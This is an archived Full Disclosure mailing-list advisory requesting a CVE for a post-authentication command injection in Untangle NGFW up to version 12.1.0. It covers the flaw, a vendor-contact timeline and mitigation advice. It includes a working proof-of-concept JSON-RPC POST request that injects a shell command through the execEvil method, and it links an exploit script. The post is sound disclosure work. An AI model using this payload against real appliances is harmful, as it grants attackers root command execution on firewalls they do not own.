[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[fd] CVE ID request: Untangle NGFW <= v12.1.0 post-auth command injection

To: fulldisclosure@xxxxxxxxxxxx, submissions@xxxxxxxxxxxxxxxxxxxxxxx
Subject: [fd] CVE ID request: Untangle NGFW <= v12.1.0 post-auth command injection
From: Matt Bush <matt@xxxxxxxxxxx>
Date: Mon, 27 Jun 2016 17:36:11 +1000 (AEST)

Product: 

https://www.untangle.com/untangle-ng-firewall/

Description:

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command 
Injection') 

The Untangle NGFW <= 12.1.0 web interface is prone to a command injection 
vulnerability, allowing non-root users to execute arbitrary commands with root 
privileges and gain remote shell access to the appliance. 

This vulnerability can be triggered via modifying any request made via 
functionality accessible from the Network->Troubleshooting->Network Tests 
window using an intercepting proxy or with otherwise crafted requests to abuse 
the execEvil() function.

The appliance web interface is accessible via unsecured HTTP by default. This 
leaves the appliance vulnerable to Man-in-the-Middle attacks that allow 
attackers to intercept plaintext credentials, facilitating exploitation of this 
vulnerability for further elevation of privileges.

Solution:

No official solution is currently available. Restrict access, consider 
Administrator interface access equivalent to root privileges.

Vulnerability Discovery:
Matthew Bush (The Missing Link)

Proof of Concept:
With a local intercepting proxy, alter the "params" field for any POST request 
to execEvil to execute any arbitrary command (eg, using the Ping Test) once 
logged in and assigned a nonce value for the session:

---

POST http://192.168.68.154/webui/JSON-RPC HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: text/plain
Content-Length: 99
Cookie: JSESSIONID=3C6A2963EFB628FA83AF6B6563222C6F; 
pysid=ce0629f79bd506f9543381e7eb7d7b7a
Connection: keep-alive
Host: 192.168.68.154

{"id":5,"nonce":"fbejsu4c77toq8a5igr1320i2p","method":".obj#2082962752.execEvil","params":["id"]}

---

Exploit:
https://github.com/3xocyte/Exploits/blob/master/untangle-ngfw-12.1-ci.py

Disclosure Timeline:
22/4/2016                       Attempted to contact vendor after discovery of 
vulnerabilities
6/5/2016                        No response from vendor, vulnerabilities 
reported to US-CERT (assigned VU#538103)
12/5/2016                       US-CERT confirms contacting vendor
16/6/2016                       US-CERT notifies of no response from vendor, 
suggested requesting CVE-ID via mailing list
27/6/2016                       Public disclosure

Discovery Credit:
Matt Bush (@3xocyte)
The Missing Link (Sydney, Australia)

Prev by Date: MyLittleForum v2.3.5 PHP Command Injection
Next by Date: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Previous by thread: MyLittleForum v2.3.5 PHP Command Injection
Next by thread: BigTree CMS <= 4.2.11 Authenticated SQL Injection Vulnerability
Index(es):
- Date
- Thread